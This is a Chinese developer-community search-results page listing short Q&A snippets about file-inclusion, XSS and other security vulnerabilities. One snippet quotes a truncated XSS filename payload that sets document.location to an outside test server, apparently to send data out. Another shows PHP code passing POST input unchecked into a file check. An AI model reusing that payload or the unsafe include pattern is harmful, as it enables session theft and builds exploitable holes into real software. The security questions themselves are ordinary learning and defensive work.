腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
搜索
搜索
关闭
发布
搜索
关闭
文章
问答
(9999+)
视频
开发者手册
清单
用户
专栏
沙龙
全部问答
原创问答
Stack Exchange问答
更多筛选
回答情况:
全部
有回答
回答已采纳
提问时间:
不限
一周内
一月内
三月内
一年内
问题标签:
未找到与 相关的标签
筛选
重置
4
回答
is_file()和本地
文件
包含
漏洞
他给了我源
文件
,我发现了一些东西,在我看来,这可能会导致许多问题,但像以前一样,我的朋友说这部分代码是安全的: if(is_file('foo/' . $_POST['f'] .
浏览 1
修改于2013-05-05
得票数 0
1
回答
spring java中的本地
文件
包含
漏洞
昨天,安全团队共享了一个网址,以利用本地
文件
包含
漏洞
(在浏览器上暴露web.xml )。web.xml <?
浏览 1
修改于2017-10-31
得票数 1
1
回答
简单的远程
文件
包含
漏洞
不能工作?
因此,我托管了一个易受RFI攻击的php
文件
,代码如下:<?php ?>
浏览 0
提问于2017-04-26
得票数 0
4
回答
包含
文件
漏洞
在index.php
文件
中,他们在代码的第一行写道你可以从上看到完整的claroline源代码。
浏览 1
修改于2012-07-26
得票数 0
回答已采纳
3
回答
.ova
文件
可以
包含
漏洞
吗?
是否可以为准备一个.ova
文件
,该
文件
将在设置为使用Whonix时访问NAT网络?Whonix中可以使用像Windows这样的预先配置的虚拟机,但是它们是否可以安全地导入?
浏览 0
提问于2017-12-14
得票数 8
回答已采纳
1
回答
是否有权威的
漏洞
分类?
是否对
漏洞
进行了分类?但我没有找到权威的
漏洞
分类。在Web应用程序
漏洞
之下,应该有XSS/SSRF/XXE...。
浏览 0
修改于2020-09-09
得票数 0
回答已采纳
3
回答
Web应用程序渗透测试方法
我正在学习一门课程,培训师建议在尝试利用这些
漏洞
之前,先确定影响web应用程序的所有
漏洞
。虽然我理解识别所有
漏洞
的必要性,但我不明白为什么要在尝试利用我刚刚发现的
漏洞
之前(比如sql注入、命令注入、远程
文件
包含
、.)等会儿再来吧? 有理由这样做吗?
浏览 0
提问于2016-06-11
得票数 2
1
回答
使用Cordova 5.3.3cli用于Android,但无法在Google上上传apk?
这个应用程序使用的软件
包含
了用户的安全
漏洞
。Apache修复了Apache v.3.5.1中的
漏洞
。有关
漏洞
的更多信息,以及有关升级Apache的指导,请参见。 请帮帮忙。我会感谢你的帮助。
浏览 6
提问于2015-11-04
得票数 1
3
回答
不使用/利用
文件
名中的XSS
我试图利用
文件
上传的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以
包含
类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这个
漏洞
吗?
浏览 0
修改于2018-04-19
得票数 2
回答已采纳
1
回答
什么是auth_user_file.txt?
我读到了一个安全
漏洞
,发现很多网站都抓取了这个
文件
,并出现在搜索结果中。它看起来很重要,但我不知道它做什么/
包含
什么,而且我似乎找不到任何关于它的信息。我对该
文件
进行的每一次搜索都会返回有关该
漏洞
的结果。 这个
文件
是什么,它
包含
什么,它的用途是什么?
浏览 5
修改于2011-03-29
得票数 2
回答已采纳
2
回答
如何将android eclipse项目迁移到libpng的更高版本?
最近,我的android游戏应用因为
包含
Libpng
漏洞
而被拒绝。从Buildbox创建的游戏,而我没有buildbox项目
文件
。我只有eclipse项目
文件
。游戏运行正常,但当我尝试更改libs
文件
夹的新版本时,它不工作。那么我该如何解决这个问题,以及如何升级更新版本的libpng“此应用程序使用的软件
包含
用户的安全
漏洞
,或者允许在未适当披露的情况下收集用户数据。以下是在您最近提交的
文件
中检测到的问题列表和
浏览 23
提问于2017-02-14
得票数 0
1
回答
Artifactory tomcat GhostCast
漏洞
我想知道,既然Artifactory RPM与Tomcat一起提供,Artifactory团队会很快解决Tomcat Ghostcat
漏洞
吗?CVE-2020-1938 | Ghostcat - Apache Tomcat AJP
文件
读取/
包含
漏洞
浏览 51
修改于2020-03-08
得票数 0
1
回答
用假定位创建的
文件
中有哪些
漏洞
?
如果我们创建一个
包含
fallocate的swapfile,则会被告知该
文件
包含
漏洞
,因此操作将停止。它是否是未分配的磁盘空间,从而使整个
文件
分配本身成为一个
漏洞
?如下所示:block2 ->空或 是否预先分配的块之间存在
漏洞
,因此它们并不是连续的?
浏览 0
修改于2019-05-12
得票数 10
回答已采纳
1
回答
像Stuxnet和Flamer这样的恶意软件是如何通过USB记忆棒传播的?
显然,发现了一个涉及.lnk
文件
的新
漏洞
,当查看
包含
.lnk
文件
的记忆棒上的
文件
夹时,可以运行该
文件
上的任何
文件
?这是如何工作的,这是一个零日
漏洞
吗?
浏览 0
修改于2012-07-13
得票数 2
回答已采纳
3
回答
为什么CWE中有多个“硬编码密码”条目而不是单个条目?
当我在软件世界中查找硬编码密码
漏洞
时,我看到了三种
漏洞
。这些是:硬编码的Cred
漏洞
定义:“该软件
包含
硬编码凭据,如密码或密码密钥,用于自己的入站身份验证、与外部组件的出站通信或内部数据加密。”CWE-259:使用硬编码密码Config
漏洞
定义中的密码:“软件将密码存储在配置
文件
浏览 0
修改于2023-01-05
得票数 5
回答已采纳
1
回答
来自github的django项目的潜在安全
漏洞
邮件
我的大部分项目在requirements.txt
文件
中
包含
django依赖项。我的requirements.txt
文件
包含
如下内容-pytz==2018.5正文: shahjalalh,我们在您已被授予安全警报访问权限的存储库中发现了一个潜在的安全
漏洞
浏览 0
提问于2018-10-07
得票数 0
1
回答
JS
文件
中出现的恶意软件
有些东西正在自动编辑我们站点的全局JS
文件
,以
包含
恶意软件。这是CHMODing
文件
,一次一个,到777,然后附加代码。它最初只有一个
文件
,但现在已经移动到两个
文件
。该站点位于运行PHP/mySQL/JQuery的apache服务器上 这是一场噩梦,这种行为是否暗示了任何特定类型的利用
漏洞
(FTP?JS?SQL?)恶意软件导致“黑洞
漏洞
利用”
浏览 0
修改于2012-03-08
得票数 0
1
回答
来自XSS的LFI还是RFI?
XSS能引导我们找到本地
文件
包含
还是远程
文件
包含
?我读过一篇文章,它可以通过XSS
漏洞
上传shell,但我仍然不知道它是如何实现的。
浏览 0
修改于2012-06-08
得票数 1
回答已采纳
3
回答
获取由window安装但命令行"where“看不到的程序的安装路径。
我有一个Interop Excel应用程序,通过Window安装,它只
包含
.dlls,不
包含
可执行
文件
/.exe。"Add/Remove program“和wmic product get name列表都可以看到该
漏洞
,但where命令(指的是)看不到该
漏洞
。 我正在写一个批处理
文件
,以便在安装后修改一些
文件
。如何在我的批处理
文件
中获取该程序的安装路径?
浏览 2
修改于2021-11-17
得票数 2
1
回答
如果本地
文件
包含
(LFI),我应该下载或检查Windows系统上的哪些
文件
?
关于Windows系统上的本地
文件
包含
(LFI)
漏洞
,我有一个问题。当可以从操作系统(OS)下载任何
文件
时,我应该先下载哪个
文件
? 我目前只知道这个
漏洞
,没有关于目录结构等的进一步信息。
浏览 0
修改于2017-02-22
得票数 8
第 2 页
第 3 页
第 4 页
第 5 页
第 6 页
第 7 页
第 8 页
第 9 页
第 10 页
第 11 页
点击加载更多
领券